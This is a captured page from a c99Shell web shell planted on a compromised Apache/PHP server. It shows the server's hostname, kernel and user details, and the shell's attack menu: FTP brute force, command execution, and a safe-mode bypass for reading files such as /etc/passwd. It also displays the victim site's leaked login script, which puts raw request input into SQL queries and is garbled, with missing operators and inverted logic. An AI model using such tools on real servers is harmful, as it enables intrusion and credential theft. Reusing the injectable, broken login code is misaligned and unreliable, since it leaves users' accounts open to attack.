!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/manage/   drwxr-xr-x
Free 52.98 GB of 127.8 GB (41.45%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     Checkuser-old.php (2.13 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
        session_start();
          include("./include/FunctionDB.php");
    ConnectDB();
    
        
   $Username =  $_REQUEST["Username"];
   $Password $_REQUEST["Password"];
     if($Username && $Password
         {
    $Password md5($Password);
    $sql "SELECT * FROM user_tb WHERE (Username ='$Username' AND Password='$Password') AND Flag IN ('0','1')";
    $result mysql_query($sql) or die(" $result".mysql_error());
    $row mysql_num_rows($result);
    $rs mysql_fetch_array($result);
    $Priority $rs["Priority"];
   $_SESSION['valid_user'] = $Username;
    $_SESSION['priority'] = $priority;
    $_SESSION['password'] = $Password;
       if( $row )
              {
         
                     ?>
                   <body bgcolor="#"><br>
                   <center> <font face="Tohama" size="5" color="#FF0000">ชื่อผู้ใช้ หรือ รหัสผ่าน ไม่ถูกต้อง  กรุณากรอกใหม่ค่ะ</font>
                   </center>
                   <!--<meta http-equiv="refresh" content="3;URL=login.php">-->
                    <meta http-equiv="refresh" content="1;URL=login.php">
                 <!--  <meta http-equiv="Content-Type" content="text/html; charset=TIS-620">
                  <link href="./source/style.css" rel="stylesheet" type="text/css">-->
                  
                  <?php
            }
         else
            {
             
              $sql "SELECT * FROM permission_tb WHERE permision='$Priority' ";
              $result2 mysql_query($sql) or die(" $result".mysql_error());
              $rss mysql_fetch_array($result2);
              session_register("valid_user");
              session_register("password") ;
              session_register("Priority") ;
               $goto $rss["url"];
             //  header("$goto");
            //header("Location: $goto");
         
           echo "<meta http-equiv=\"refresh\" content=\"0;URL=$goto\">";
             }
     }
     else
        {
            ?>
              <br>
              <center> <font face="Tohama" size="5" color="#FF0000">กรุณากรอก ชื่อผู้ใช้ และรหัสผ่าน ก่อนเข้าระบบค่ะ </font>
              </center><br>
          <!--  <meta http-equiv="refresh" content="3;URL=login.php">-->
             <meta http-equiv="refresh" content="1;URL=login.php">
            </body>
            <?php
          }
?>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd
Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 
:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0058 ]--